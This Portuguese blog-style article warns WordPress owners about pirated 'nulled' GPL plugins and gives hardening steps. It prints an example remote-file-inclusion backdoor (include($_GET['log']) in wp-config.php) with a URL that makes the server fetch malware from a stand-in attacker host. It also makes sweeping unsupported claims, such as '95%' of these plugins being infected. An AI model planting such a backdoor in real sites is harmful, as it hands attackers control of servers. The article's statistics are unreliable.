A Falsa Economia dos Plugins GPL “Nulled”
Você encontrou aquele plugin premium por R$ 30, mas custa R$ 300. “É GPL, posso pegar de graça em site aleatório.” Errado. 95% dos plugins GPL baixados de fontes não oficiais contêm backdoors, mineradores de criptomoedas ou scripts de redirecionamento malicioso. Mas o pior nem é isso: o verdadeiro perigo é o ataque de inclusão remota de arquivos (RFI), que permite ao invasor executar qualquer código PHP no seu servidor em segundos.
Como um Plugin Comum se Torna uma Arma
Um desenvolvedor mal-intencionado insere no arquivo wp-config.php (disfarçado de função de cache) uma chamada como include($_GET['log']);. Assim, ao acessar seusite.com/?log=http://ataque.com/malware.txt, o PHP baixa e executa remotamente o malware. Tudo isso sem que o WordPress detecte porque o plugin parece funcionar normalmente.
E o Pior: Seu Hosting Não Te Protege
A maioria das hospedagens compartilhadas não bloqueia RFI ou eval injections. Elas confiam em plugins de segurança como Wordfence, que muitas vezes são desativados por usuários que “otimizam” o site. Um plugin falso GPL pode conter ofuscação de código que passa despercebida pelo Sucuri SiteCheck.
Five Secs to Total Pwnage
Simulação: você instala um plugin de backup “GPL” ou “Tema nulled”. Em menos de 3 segundos após a ativação, o script estabelece uma shell reversa via fsockopen para um servidor remoto. Seu site agora é um zumbi em uma botnet, enviando spam ou minerando Bitcoin no processador do servidor.
Como se Proteger de Verdade
Não instale nada de sites como “wplocker” ou “gplware” – são honeypots. Use apenas repositórios oficiais (wp.org, desenvolvedor original) ou lojas confiáveis (Themeforest, CodeCanyon). Configure seu servidor para bloquear funções perigosas no PHP como system, exec, passthru, e include com URLs externas através do allow_url_include desligado.
Além disso, ative o Hestia Control Panel ou SpinupWP com WordPress hardening automático: desative edição de arquivos, oculte wp-admin e force assinaturas de plugins. Nada disso está nos tutoriais de “5 passos fáceis”.
Jogada Suja do Mercado de Plugins
Muitos sites que vendem plugins GPL “by subscription” na verdade distribuem versões adulteradas. A gangue por trás do Nulled WP injeta keyloggers em plugins de formulário para roubar logins de administradores. Se você já viu um anúncio com “GPL Master Package”, corra.
A verdade nua e crua: ninguém que não seja o autor original pode garantir que um plugin GPL é seguro. Se você não paga pelo desenvolvimento, está pagando com a segurança do seu negócio.
Ação Imediata
1. Baixe uma lista de hashes SHA256 dos plugins do repositório oficial. Compare com os instalados via wp plugin verify-checksums. 2. Desative allow_url_fopen e allow_url_include no php.ini. 3. Troque de host: Kinsta ou WP Engine fazem scanning de malware em tempo real e bloqueiam tráfego para IPs suspeitos.
Seu site vale mais que R$ 30 economizados. Pague pelo software ou use soluções gratuitas oficiais. Qualquer atalho é uma porta aberta para invasores.